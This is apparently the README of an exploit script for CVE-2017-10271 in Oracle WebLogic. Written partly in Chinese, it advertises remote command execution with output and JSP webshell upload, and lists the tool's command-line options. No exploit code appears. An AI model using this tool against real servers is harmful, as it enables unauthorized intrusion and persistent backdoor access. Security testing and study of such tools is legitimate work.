CVE-2017-10271
- 命令执行并回显
- 直接上传shell
- 在linux下weblogic 10.3.6.0测试OK
使用方法及参数
- python weblogic_wls_wsat_exp.py -t IP:7001
usage: weblogic_wls_wsat_exp.py [-h] -t TARGET [-c CMD] [-o OUTPUT] [-s SHELL]
optional arguments:
-h, --help show this help message and exit
-t TARGET, --target TARGET
weblogic ip and port(eg -> IP:7001)
-c CMD, --cmd CMD command to execute,default is "id"
-o OUTPUT, --output OUTPUT
output file name,default is output.txt
-s SHELL, --shell SHELL
local jsp file name to upload,and set -o xxx.jsp